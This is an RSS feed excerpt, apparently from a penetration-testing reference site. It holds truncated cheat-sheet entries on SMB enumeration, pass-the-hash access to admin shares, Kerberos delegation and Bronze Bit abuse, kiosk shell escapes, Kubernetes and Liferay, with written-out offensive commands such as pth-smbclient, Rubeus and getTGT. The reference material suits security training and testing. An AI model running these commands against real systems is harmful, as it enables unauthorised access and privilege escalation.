&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;smbmap&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="c"&gt;# null session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;smbmap&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="n"&gt;PATH&lt;/span&gt; &lt;span class="c"&gt;# recursive listing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;smbmap&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;invaliduser&lt;/span&gt; &lt;span class="c"&gt;# guest smb session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;smbmap&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;DOMAIN.LOCAL&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;USERNAME&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Password123*&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/byt3bl33d3r/pth-toolkit"&gt;byt3bl33d3r/pth-smbclient&lt;/a&gt; from path-toolkit&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;pth-smbclient&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Share&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;pth-smbclient&lt;/span&gt; &lt;span class="n"&gt;-U&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;ls &lt;/span&gt; &lt;span class="c"&gt;# list files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd &lt;/span&gt; &lt;span class="c"&gt;# move inside a folder&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="c"&gt;# download files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;put&lt;/span&gt; &lt;span class="c"&gt;# replace a file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/SecureAuthCorp/impacket"&gt;SecureAuthCorp/smbclient&lt;/a&gt; from Impacket&lt;/p&gt;</description></item><item><title>Kerberos - Bronze Bit</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-bronze-bit/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-bronze-bit/</guid><description>&lt;p&gt;CVE-2020-17049&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;An attacker can impersonate users which are not allowed to be delegated. This includes members of the &lt;strong&gt;Protected Users&lt;/strong&gt; group and any other users explicitly configured as &lt;strong&gt;sensitive and cannot be delegated&lt;/strong&gt;.
Patch is out on November 10, 2020, DC are most likely vulnerable until &lt;a href="https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049"&gt;February 2021&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: Patched Error Message : &lt;code&gt;[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Service account&amp;rsquo;s password hash&lt;/li&gt;
&lt;li&gt;Service account&amp;rsquo;s with &lt;code&gt;Constrained Delegation&lt;/code&gt; or &lt;code&gt;Resource Based Constrained Delegation&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SecureAuthCorp/impacket/pull/1013"&gt;Impacket PR #1013&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Attack #1&lt;/strong&gt; - Bypass the &lt;code&gt;Trust this user for delegation to specified services only – Use Kerberos only&lt;/code&gt; protection and impersonate a user who is protected from delegation.&lt;/p&gt;</description></item><item><title>Kerberos - Service for User Extension</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-s4u/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-s4u/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Service For User To Self&lt;/strong&gt; which allows a service to obtain a TGS on behalf of another user&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Service For User To Proxy&lt;/strong&gt; which allows a service to obtain a TGS on behalf of another user on another service&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="s4u2self---privilege-escalation" class="anchored-heading"&gt;S4U2self - Privilege Escalation&lt;a class="heading-anchor" href="#s4u2self---privilege-escalation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Get a TGT&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Using Unconstrained Delegation&lt;/li&gt;
&lt;li&gt;Using the current machine account: &lt;code&gt;Rubeus.exe tgtdeleg /nowrap&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Using credentials: &lt;code&gt;getTGT.py -dc-ip &amp;quot;$DC_IP&amp;quot; -hashes :&amp;quot;$NT_HASH&amp;quot; &amp;quot;$DOMAIN&amp;quot;/&amp;quot;machine$&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.&lt;/p&gt;</description></item><item><title>Kerberos - Tickets</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-tickets/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-tickets/</guid><description>&lt;p&gt;Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user&amp;rsquo;s identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours.&lt;/p&gt;
&lt;p&gt;There are two types of tickets in Kerberos:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Ticket Granting Ticket&lt;/strong&gt; (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user&amp;rsquo;s identity, a timestamp, and an encryption of the user&amp;rsquo;s secret key.&lt;/p&gt;</description></item><item><title>Kerberos Delegation - Constrained Delegation</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-constrained/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-constrained/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Kerberos Constrained Delegation (KCD) is a security feature in Microsoft&amp;rsquo;s Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="identify-a-constrained-delegation" class="anchored-heading"&gt;Identify a Constrained Delegation&lt;a class="heading-anchor" href="#identify-a-constrained-delegation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;BloodHound: &lt;code&gt;MATCH p = (a)-[:AllowedToDelegate]-&amp;gt;(c:Computer) RETURN p&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;PowerView: &lt;code&gt;Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Native&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-DomainComputer&lt;/span&gt; &lt;span class="n"&gt;-TrustedToAuth&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;-exp&lt;/span&gt; &lt;span class="n"&gt;dnshostname&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Get-DomainComputer&lt;/span&gt; &lt;span class="n"&gt;previous_result&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select &lt;/span&gt;&lt;span class="n"&gt;-exp&lt;/span&gt; &lt;span class="nb"&gt;msds-AllowedToDelegateTo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;bloodyAD:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bloodyAD&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;totoTOTOtoto1234*&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;crash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;10.100&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(&amp;amp;(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-attr&lt;/span&gt; &lt;span class="n"&gt;sAMAccountName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;msds-allowedtodelegateto&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit-the-constrained-delegation" class="anchored-heading"&gt;Exploit the Constrained Delegation&lt;a class="heading-anchor" href="#exploit-the-constrained-delegation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Impacket&lt;/p&gt;</description></item><item><title>Kerberos Delegation - Resource Based Constrained Delegation</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-rbcd/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-rbcd/</guid><description>&lt;p&gt;Resource-based Constrained Delegation was introduced in Windows Server 2012.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The user sends a Service Ticket (ST) to access the service (&amp;ldquo;Service A&amp;rdquo;), and if the service is allowed to delegate to another pre-defined service (&amp;ldquo;Service B&amp;rdquo;), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. &amp;lt;https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html&amp;gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Import &lt;strong&gt;Powermad&lt;/strong&gt; and &lt;strong&gt;Powerview&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;PowerShell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-ExecutionPolicy&lt;/span&gt; &lt;span class="n"&gt;Bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;powermad&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;powerview&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Get user SID&lt;/p&gt;</description></item><item><title>Kerberos Delegation - Unconstrained Delegation</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-unconstrained/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/kerberos-delegation-unconstrained/</guid><description>&lt;blockquote&gt;
&lt;p&gt;The user sends a ST to access the service, along with their TGT, and then the service can use the user&amp;rsquo;s TGT to request a ST for the user to any other service and impersonate the user.
When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user&amp;rsquo;s TGT ticket gets saved to that computer&amp;rsquo;s memory.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;:warning: Unconstrained delegation used to be the only option available in Windows 2000&lt;/p&gt;</description></item><item><title>Kiosk Escape and Jail Breakout</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/escape-breakout/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/escape-breakout/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#gaining-a-command-shell"&gt;Gaining a command shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sticky-keys"&gt;Sticky Keys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dialog-boxes"&gt;Dialog Boxes&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#creating-new-files"&gt;Creating new files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#open-a-new-windows-explorer-instance"&gt;Open a new Windows Explorer instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploring-context-menus"&gt;Exploring Context Menus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#save-as"&gt;Save as&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#input-boxes"&gt;Input Boxes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bypass-file-restrictions"&gt;Bypass file restrictions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#internet-explorer"&gt;Internet Explorer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#shell-uri-handlers"&gt;Shell URI Handlers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kiosk.vsim.xyz/"&gt;kiosk.vsim.xyz&lt;/a&gt; - Tooling for browser-based, Kiosk mode testing.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://break.yxz.red/"&gt;break.yxz.red&lt;/a&gt; - Breakout Kit for Web Browser / Kiosk breakout Assessments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="methodology" class="anchored-heading"&gt;Methodology&lt;a class="heading-anchor" href="#methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Display global variables and their permissions: &lt;code&gt;export -p&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Switch to another user using &lt;code&gt;sudo&lt;/code&gt;/&lt;code&gt;su&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/"&gt;Linux&lt;/a&gt; / &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/"&gt;Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;List default commands in the restricted shell: &lt;code&gt;compgen -c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Container escape if it&amp;rsquo;s running inside a &lt;code&gt;Docker&lt;/code&gt;/&lt;code&gt;LXC&lt;/code&gt; container&lt;/li&gt;
&lt;li&gt;Pivot onto the network
&lt;ul&gt;
&lt;li&gt;Scan other machines on the network or attempt SSRF exploitation&lt;/li&gt;
&lt;li&gt;Metadata for Cloud assets, see &lt;code&gt;cloud/aws&lt;/code&gt; and &lt;code&gt;cloud/azure&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Use globbing capability built inside the shell: &lt;code&gt;echo *&lt;/code&gt;, &lt;code&gt;echo .*&lt;/code&gt;, &lt;code&gt;echo /*&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="gaining-a-command-shell" class="anchored-heading"&gt;Gaining a command shell&lt;a class="heading-anchor" href="#gaining-a-command-shell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Shortcut&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;[Window] + [R] -&amp;gt; cmd&lt;/li&gt;
&lt;li&gt;[CTRL] + [SHIFT] + [ESC] -&amp;gt; Task Manager&lt;/li&gt;
&lt;li&gt;[CTRL] + [ALT] + [DELETE] -&amp;gt; Task Manager&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Access through file browser&lt;/strong&gt;: Browsing to the folder containing the binary (i.e. &lt;code&gt;C:\windows\system32\&lt;/code&gt;), we can simply right click and &lt;code&gt;open&lt;/code&gt; it&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Drag-and-drop&lt;/strong&gt;: dragging and dropping any file onto the cmd.exe&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hyperlink&lt;/strong&gt;: &lt;code&gt;file:///c:/Windows/System32/cmd.exe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Task Manager&lt;/strong&gt;: &lt;code&gt;File&lt;/code&gt; &amp;gt; &lt;code&gt;New Task (Run...)&lt;/code&gt; &amp;gt; &lt;code&gt;cmd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MSPAINT.exe&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Open MSPaint.exe and set the canvas size to: &lt;code&gt;Width=6&lt;/code&gt; and &lt;code&gt;Height=1&lt;/code&gt; pixels&lt;/p&gt;</description></item><item><title>Kubernetes</title><link>https://bokkapig.pages.dev/refs/internal/containers/kubernetes/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/containers/kubernetes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#container-environment"&gt;Container Environment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#information-gathering"&gt;Information Gathering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rbac-configuration"&gt;RBAC Configuration&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#listing-secrets"&gt;Listing Secrets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#access-any-resource-or-verb"&gt;Access Any Resource or Verb&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pod-creation"&gt;Pod Creation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-to-use-podsexec"&gt;Privilege to Use Pods/Exec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-to-getpatch-rolebindings"&gt;Privilege to Get/Patch Rolebindings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#impersonating-a-privileged-account"&gt;Impersonating a Privileged Account&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#privileged-service-account-token"&gt;Privileged Service Account Token&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#kubernetes-endpoints"&gt;Kubernetes Endpoints&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploits"&gt;Exploits&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#accessible-kubelet-on-10250tcp"&gt;Accessible kubelet on 10250/TCP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#obtaining-service-account-token"&gt;Obtaining Service Account Token&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/BishopFox/badpods"&gt;BishopFox/badpods&lt;/a&gt; - A collection of manifests that will create pods with elevated privileges.&lt;/p&gt;</description></item><item><title>Liferay</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/liferay/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/liferay/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Liferay Portal is an open-source enterprise portal platform used for building web applications and digital experiences. It provides features like content management, user authentication, collaboration tools, and customizable dashboards. - &lt;a href="https://github.com/liferay/liferay-portal"&gt;liferay/liferay-portal&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#portlets"&gt;Portlets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#login-page"&gt;Login Page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#register-page"&gt;Register Page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-configuration"&gt;User Profile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-configuration"&gt;User Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#control-panel"&gt;Control Panel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#api"&gt;API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vulnerabilities"&gt;Vulnerabilities&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#open-redirect"&gt;Open Redirect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#code-execution-on-administrator-control-panel"&gt;Code Execution on Administrator Control Panel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#resource-leakage-through-i18nservlet"&gt;Resource Leakage Through I18nServlet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#remote-code-execution-via-json-web-services"&gt;Remote Code Execution via JSON web services&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="portlets" class="anchored-heading"&gt;Portlets&lt;a class="heading-anchor" href="#portlets" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
